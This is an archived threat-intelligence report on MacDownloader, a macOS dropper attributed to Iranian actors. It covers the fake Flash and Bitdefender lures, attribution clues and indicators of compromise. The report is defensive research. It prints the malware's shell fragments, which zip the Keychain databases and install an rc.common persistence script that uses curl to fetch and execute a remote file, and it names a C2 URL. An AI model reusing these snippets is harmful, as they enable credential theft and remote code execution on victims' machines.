{ "id": "9412e97f-e3c5-4c50-8d77-30e0711f9ada", "created_at": "2026-04-06T00:12:02.411381Z", "updated_at": "2026-04-10T03:37:55.898597Z", "deleted_at": null, "sha1_hash": "6c86760d61e13ea7829a18361d480bd791c11841", "title": "iKittens: Iranian Actor Resurfaces with Malware for Mac (MacDownloader)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2169137, "plain_text": "iKittens: Iranian Actor Resurfaces with Malware for Mac\r\n(MacDownloader)\r\nArchived: 2026-04-05 15:57:42 UTC\r\nPublic Notice (6 February 2017)\r\nSummary\r\nA macOS malware agent, named MacDownloader, was observed in the wild as targeting the defense industrial\r\nbase, and reported elsewhere to have been used against an human rights advocate. MacDownloader strangely\r\nattempts to pose as both an installer for Adobe Flash, as well as the Bitdefender Adware Removal Tool, in order to\r\nextract system information and copies of OS X keychain databases. Based on observations on infrastructure, and\r\nthe state of the code, we believe these incidents represent the first attempts to deploy the agent, and features such\r\nas persistence do not appear to work. Instead, MacDownloader is a simple exfiltration agent, with broader\r\nambitions.\r\nThe macOS malware also mirrors the approach of the ExtremeDownloader dropper previously documented in our\r\nresearch, and samples of the latter identified during this time used the same infrastructure. Lastly, the exposure of\r\ntest victim data and code references provide a unique insight into the development of the malware, with potential\r\nconnections to agents developed by long dormant threat groups.\r\nSince the Technical Preview of our forthcoming Carnegie Endowment publication about state-sponsored\r\nespionage campaigns was released at Black Hat USA, we have continued to disclose information about current\r\nIranian activities in order to promote public education and to provide indicators of compromise. While this agent\r\nis neither sophisticated nor full-featured, its sudden appearance is concerning given the popularity of Apple\r\ncomputers with certain community, and inaccurate perceptions about the security of those devices.\r\nBackground\r\nSince the start of the Iran Threats posts, we have documented an ever-changing array of malware agents targeting\r\nWindows and Android devices in order to exfiltrate files and record keystrokes from victims. While Windows\r\nremains the dominant operating system in the world, many communities have shifted over to macOS in the\r\ninterest of security and stability. However, much of the added security afforded to macOS users stems from an\r\nexpectation of Windows by attackers and less readily-available remote access tools for the OS, rather than better\r\nin-built defenses. Thus, macOS users are at risk of assuming greater protection against malware than actually\r\nexists, and could be more vulnerable as a result. One of these communities is the human rights community,\r\nespecially those focused on Iran, which based on anecdotal experience is strongly dependent on Apple devices.\r\nIncident and Impact\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 1 of 9\n\nAn active staging of the MacDownloader agent was first observed linked out from a site impersonating the\r\naerospace firm \"United Technologies Corporation,\" a spearphishing site was previously believed to be maintained\r\nby Iranian actors for spreading Windows malware. The page claimed to offer \"Special Programs And Courses,\"\r\nspecifically mentioning employees and interns of Lockheed Martin, Sierra Nevada Corporation, Raytheon and\r\nBoeing. The citation of the aforementioned companies also aligned with known targeting of spearphishing\r\ncampaigns by the same group. The host used to stage the malware had also previously been used to deploy the\r\nBeEF framework on subdomains that appeared as a dental office and a U.S. Air Force basic training page.\r\nCounterintuitively, the bait to download the agent features a French-language warning in the place\r\nof a video player that informs the visitor that the \"plugin has security flaws,\" with a link to activate Adobe Flash.\r\nMacDownloader is the first spearphishing attempt we have observed that honestly informs its target about its\r\nmalicious nature. The target will be provided either Windows or Mac malware based on the detected operating\r\nsystem, with Windows clients provided a dropper written in Go. The packaging of the MacDownloader sample\r\nalso provides further indication of its Iranian origin through its name, \"addone flashplayer.app,\" which would\r\nsuggest that a Persian-language speaker named the file based on grammar. The continuity of certain infrastructure\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 2 of 9\n\nand trends in targeting suggest a relationship to the Charming Kitten actor group, believed to based in Iran and\r\nconnected to Iranian security entities.\r\nMacDownloader\r\nThe malware utilized in these attacks is a macOS-specific dropper (a 64-bit Mach-O binary) named\r\nMacDownloader based on strings from the development environment that are embedded in the binary.\r\nMacDownloader seems to be poorly developed and created towards the end of 2016, potentially a first attempt\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 3 of 9\n\nfrom an amateur developer. In multiple cases, the code used has been copied from elsewhere. The simple activity\r\nof downloading the remote file appears to have been sourced from a cheat sheet. The main purpose of\r\nMacDownloader seems to be to perform an initial profiling of the infected system and collection of credentials\r\nfrom macOS’s Keychain password manager – which mirrors the focus of Windows malware developed by the\r\nsame actors.\r\nAt the time of writing, MacDownload appears completely undetected by virus scanning engines on VirusTotal,\r\nwhich suggests that consumer antivirus software may have difficulty detecting the agent.\r\nWith this particular build of MacDownloader, a fake Adobe Flash Player dialog is displayed upon execution,\r\nprompting the victim to click on an \"Update Flash-Player\" button. Interestingly, clicking on the \"Close\" button\r\ndoes in fact make the application exit. After the victim would have successfully clicked on the Update button, the\r\nfollowing fake dialog is displayed, announcing that adware was discovered on the computer and that the\r\napplication was in the process of cleaning it up.\r\nThis dialog is a bit surprising and confusing, particularly considering that the pretense of this build of\r\nMacDownloader is to rather be a Flash Player update, not antivirus software. This incongruity was soon explained\r\nwhen we noticed that in the resources of the malicious application there was a NIB file (which is a stored user\r\ninterface design for Mac applications) that seems to not have been used in this particular build. These dialogues\r\nare also rife with basic typos and grammatical errors, indicating that the developer paid little attention to quality\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 4 of 9\n\ncontrol. We believe MacDownloader was originally designed as a fake virus removal tool and in order to fit a\r\nparticular social engineering attempt, it was later repackaged as a fake Flash Player update.\r\nThe malware reads from the embedded Resources folder the \"checkadr.txt,\" which contains the URL for the first\r\nbeacon:\r\nhttp://46.17.97[.]37/Servermac.php\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 5 of 9\n\nThe C2 used in this sample was taken down by a third party two weeks ago. Another resource \"eula-help.txt\"\r\nappears to provide an internal development server address, and reflects the developer’s expectation of\r\nMacDownloader as simple a dropper.\r\nhttp://192.168.3.217/DroperTest\r\nAdditionally, a file \"appId.txt\" provides what appears to be a unique identifier for the campaign tied to the agent.\r\nThis identified is communicated to the C2 in exfiltrating data from the host. In the sample examined, and in the\r\ntesting observed, this is set as ‘snc’ -- an identifier that would align with victims of concurrent spearphishing\r\ncampaigns by the same group.\r\nIt appears that the application contains an unused attempt to install persistent access to the victim host. One\r\nsegment provides a poorly-implemented shell script to save a response from the C2 and mark it for persistence by\r\nwriting an entry in the /etc/rc.common file. In theory, every time the infected computer would start up, the shell\r\nscript would be launched to download a file from a remote location, check if it changed from the previous\r\niteration, and if so execute that new implant. While we haven’t managed to obtain a proper response from the\r\nserver before it was taken offline, our initial investigation did not find a subsequent implant. In the course of\r\ntesting, it did not appear that this code was executed, and instead calls to the remote server were made through\r\nApple’s Core Services framework instead. Moreover, GET requests without parameters against the endpoint were\r\nobserved to trigger PHP errors, rather than provide an implant. Therefore, we did not find immediate indication\r\nthat MacDownloader was persistent, only that they intended to include remote updates and persistence as a\r\nfeature.\r\ndo shell script \"uname -a \u003e /etc/checkdrive.chk\"\r\nzip -rj /etc/kcbackup.cfg /Library/Keychains/\r\necho \"#!/bin/bash\r\ncurl -o /tmp/mastering-vim.pdf %@\r\nmd5 /tmp/mastering-vim.pdf | grep vim | cut -d- -f 2 \u003e /etc/newf_md5.md5\r\nif cmp /etc/newf_md5.md5 /etc/old_md5.md5\r\nthen\r\n #echo equal\r\n cp /etc/newf_md5.md5 /etc/oldf_md5.md5\r\n chmod +x /tmp/mastering-vim.pdf\r\n /tmp/mastering-vim.pdf\r\nfi\r\n\" \u003e /etc/.checkdev \u0026\u0026 if cat /etc/rc.common | grep .checkdev; then sleep 1; else echo \"sleep %d \u0026\u0026 /e\r\n \r\nIn parallel, MacDownloader harvests information on the infected system, including the user’s active Keychains,\r\nwhich are then uploaded to the C2. The dropper also documents the running processes, installed applications, and\r\nthe username and password which are acquired through a fake System Preferences dialog. Armed with the user’s\r\ncredentials, the attackers would then be able to access the encrypted passwords stored within the Keychain\r\ndatabase. While Chrome and Firefox do not store credentials in Keychain, Safari and macOS’s system service do\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 6 of 9\n\nsave passwords to sites, remote file systems, encrypted drives, and other criteria resources there. The primary\r\nfocus on retrieving stored passwords and recording keystrokes to capture passwords for online services is a\r\ncommon trend with custom Iranian malware. Using these passwords, the actors then access accounts to take\r\npermanent backups of victim’s emails, cloud files, and social networking activities. Windows agents used by the\r\nsame group currently behave in the same manner – collecting the saved passwords and browser histories of\r\nFirefox and Chrome at the time of infection. One would anticipate this will appear in subsequent versions of\r\nMacDownloader.\r\nAll the harvested information is then compiled in a file stored at /tmp/applist.txt, and not removed after\r\nsubmission:\r\n[\r\n \"OS version:[UNAME OUTPUT]\",\r\n \"Root Username: \\\"[USER]\\\"\",\r\n \"Root Password: \\\"[PASSWORD]\\\"\",\r\n \"Keychains loaded in current user \",\r\n \"Local ip address: [IP ADDRESS]\",\r\n \"Ifconfig: [IFCONFIG OUTPUT]\",\r\n [\r\n [CONTENT OF /Applications]\r\n ],\r\n [\r\n ....\r\n \"process name is: Bitdefender Adware Removal Tool\\t PID: 17550 Run from: file:\\/\\/\\/Users\\/user\\\r\n ]\r\n]\r\n \r\nOnce the execution completed, MacDownloader smoothly displays a dialog informing that the update of Flash\r\nPlayer has completed. Needless to say, no Flash Player was installed or updated whatsoever.\r\nOrigin and Development\r\nWithin the metadata for the application (Info.plist), the MacDownloader contains unusual references that may\r\nprovide insight into its development. The \"Bundle identifier\" property is set to \"zenderod.Bitdefender-Adware-Removal-Tool,\" mirroring the secondary impersonation of Bitdefender by the agent. Under standard software\r\ndevelopment practices, the first component of the string is set to the name or company of the original developer,\r\nwhich in this case is \"zenderod.\" Zenderod is evidently a reference to the Zayandeh Rood, a famous river that runs\r\nalong Isfahan, Iran. Curiously, this shorthanded transliteration also aligns with the domain of Novin Pardaz\r\nZenderod (zenderod.ir, now directs to npzr.ir), a software and hosting company in Isfahan. While the site does not\r\nnote any expertise in macOS software development, the application would not require a sophisticated developer to\r\nproduce and appeared to at one point use shell scripts to function, which is within their stated expertise. We\r\ncontacted an individual listed as the administrative contact for Novin Pardaz Zenderod, and they denied producing\r\nmacOS software or association with the malware.\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 7 of 9\n\nAdditionally, the \"Readable Copyright\" property, which displays the copyright information available in the About\r\ndialogue, is set to \"Copyright © 2015 Mamedof. All rights reserved.\" The outdated copyright suggests that the\r\nmalware’s developer copied the template from another project. We were unable to find another application that\r\ncontained the name in the copyright, indicating that it could be from a more obscure application or previous work\r\nof the developer.\r\nIn the binary, we find a number of strings that indicate the username of the developer of MacDownloader within\r\nfilesystem paths embedded by XCode. These strings suggest that the developer’s first name is Shayan, and\r\nprovides the previously cited project name.\r\n/Users/shayan/Desktop/MacDownloader/MyApp3/\r\n/Users/shayan/Library/Developer/Xcode/DerivedData/Adware_Removal_Tool-frnnuqjzajnllqgzakkslsovdhag/Build/Intermediates/Adware Removal Tool.build/Debug/Adware\r\nRemoval Tool.build/Objects-normal/x86_64/AppDelegate.o\r\nUniquely, in the course of testing the malware agent, one of the malware operators appears to have infected a\r\nMacBook Pro. In doing so, the malware agent uploaded both system information and OS X Keychain databases to\r\nthe C2 for a user \"Ultrone\" and with password \"saeed\" -- presumably another name. While sparse, the uploaded\r\nKeychains provide some clues about the social relationships and tactics of the actor through VPN credentials and\r\nWifi network records.\r\nOf particular note are wireless networks named Jok3r and mb_1986. Jok3r corresponds with a member of a\r\ndefacement group, Iran Cyber Security Group, who continues to be fairly active in vandalizing sites. Iran Cyber\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 8 of 9\n\nSecurity Group also, as with many other defacement groups later identified as involved in state-aligned\r\ncampaigns, purports to provide commercial security services and penetration testing training.\r\nThe \"mb_1986\" wireless name is more interesting, as it provides a connection to earlier Iranian campaigns,\r\noverlapping with the Flying Kitten actor group and subsequent malware activity in summer 2014. In earlier\r\nsamples of a malware agent dubbed \"Sayad,\" multiple resources paths embedded in the malware reference\r\ndevelopment from a Windows environment running on the username \"mb_1986.\" (Specifically,\r\nc:\\Users\\mb_1986\\Desktop\\Projects\\Tiny_st\\BlackBerry\\obj\\Debug\\MSSUP.pdb). This username is also found\r\nwithin the system logs of an Iranian computer named \"BORHAN\" that was compromised multiple times by the\r\nStealer malware between December 2013 and February 2014. BORHAN had a number of professional software\r\ndevelopment tools that reflect the administration and development trends of the actors (Subversion, VMWare\r\nvSphere, and Microsoft Visual Studio). The repetitive and short-lived compromises suggest that the host was a\r\ndeveloper of the Stealer family, and that they continued to develop the platform beyond Operation Saffron Rose,\r\nwhich evolved into MiniSayad, and then socially interacted with the MacDownloader operators.\r\nIndicators of Compromise\r\nHashes\r\naddone flashplayer.app.zip\r\n52efcfe30f96a85c9c068880c20663db64f0e08346e0f3b59c2e5bbcb41ba73c\r\nBitdefender Adware Removal Tool\r\n7a9cdb9d608b88bd7afce001cb285c2bb2ae76f5027977e8635aa04bd064ffb7\r\nNetwork\r\nutc.officialswebsites[.]info\r\nContact\r\nClaudio (nex@amnesty.org)\r\nFingerprint: E063 75E6 B9E2 6745 656C 63DE 8F28 F25B AAA3 9B12\r\nCollin (cda@cda.io)\r\nPGP Key: https://cda.io/key.asc\r\nFingerprint: 510E 8BFC A60E 84B4 40EA 0F32 FAFB F2FA\r\nSource: https://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nhttps://iranthreats.github.io/resources/macdownloader-macos-malware/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "references": [ "https://iranthreats.github.io/resources/macdownloader-macos-malware/" ], "report_names": [ "macdownloader-macos-malware" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "8e1bae2f-2a21-4ba8-a6f1-42155f96aec8", "created_at": "2022-10-25T16:07:23.645758Z", "updated_at": "2026-04-10T02:00:04.700158Z", "deleted_at": null, "main_name": "Flying Kitten", "aliases": [ "Ajax Security Team", "Flying Kitten", "G0130", "Group 26", "Operation Saffron Rose" ], "source_name": "ETDA:Flying Kitten", "tools": [ "Stealer" ], "source_id": "ETDA", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "f4d7cba1-dbdd-42a9-88c5-4d0c81659ee0", "created_at": "2023-01-06T13:46:38.357581Z", "updated_at": "2026-04-10T02:00:02.941254Z", "deleted_at": null, "main_name": "Flying Kitten", "aliases": [ "Saffron Rose", "AjaxSecurityTeam", "Ajax Security Team", "Group 26", "Sayad", "SaffronRose" ], "source_name": "MISPGALAXY:Flying Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "8faa11f5-2a14-479c-9ea8-3779e6de9749", "created_at": "2022-10-25T15:50:23.814205Z", "updated_at": "2026-04-10T02:00:05.308465Z", "deleted_at": null, "main_name": "Ajax Security Team", "aliases": [ "Ajax Security Team", "Operation Woolen-Goldfish", "AjaxTM", "Rocket Kitten", "Flying Kitten", "Operation Saffron Rose" ], "source_name": "MITRE:Ajax Security Team", "tools": [ "sqlmap", "Havij" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434322, "ts_updated_at": 1775792275, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6c86760d61e13ea7829a18361d480bd791c11841.pdf", "text": "https://archive.orkl.eu/6c86760d61e13ea7829a18361d480bd791c11841.txt", "img": "https://archive.orkl.eu/6c86760d61e13ea7829a18361d480bd791c11841.jpg" } }